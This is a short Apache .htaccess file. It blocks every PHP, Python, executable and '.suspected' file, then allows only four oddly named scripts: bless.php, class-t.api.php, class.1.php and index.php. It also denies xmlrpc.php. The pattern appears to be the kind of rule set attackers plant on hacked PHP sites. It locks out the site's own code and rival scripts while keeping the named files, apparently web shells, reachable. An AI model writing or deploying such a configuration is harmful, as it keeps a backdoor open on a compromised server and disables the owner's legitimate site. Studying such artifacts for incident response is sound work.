<FilesMatch ".(py|exe|phtml|php|PhP|php5|suspected)$"> Order Allow,Deny Deny from all </FilesMatch> <FilesMatch "(^bless.php|^class-t.api.php|^class.1.php|^index.php)$"> Order allow,deny Allow from all </FilesMatch> <Files xmlrpc.php> order deny,allow deny from all </Files>